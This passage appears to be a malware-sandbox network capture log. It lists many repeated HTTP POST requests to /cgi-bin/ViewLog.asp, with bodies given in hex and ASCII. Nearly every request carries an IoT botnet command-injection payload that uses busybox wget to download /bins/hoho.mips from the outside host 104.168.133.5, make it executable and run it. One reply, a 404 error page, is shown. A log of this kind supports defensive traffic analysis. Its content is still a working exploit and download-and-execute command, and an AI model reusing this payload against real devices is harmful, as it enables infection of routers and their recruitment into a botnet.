                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              247192.168.2.135353494.122.56.2408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.522339106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              248192.168.2.135817485.69.34.2378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.902306080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.478524923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.598483086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.030630112 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.638560057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.598455906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.310522079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.174323082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              249192.168.2.135049031.136.147.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.903892040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.478502989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.630491018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.030520916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.638495922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.854490995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.310503006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.174324989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              250192.168.2.136072294.143.237.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.914792061 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              251192.168.2.134105895.86.108.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.958406925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              252192.168.2.133959485.248.73.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.126512051 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:17.766513109 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:19.014480114 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:21.542506933 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:26.662511110 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:36.646470070 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:16:56.358402014 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:
                                              Nov 23, 2023 05:17:37.318335056 CET60OUTPOST
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              253192.168.2.133879462.141.39.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.490299940 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.470493078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.656970024 CET1229INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 1012
                                              Date: Thu, 23 Nov 2023 04:16:18 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
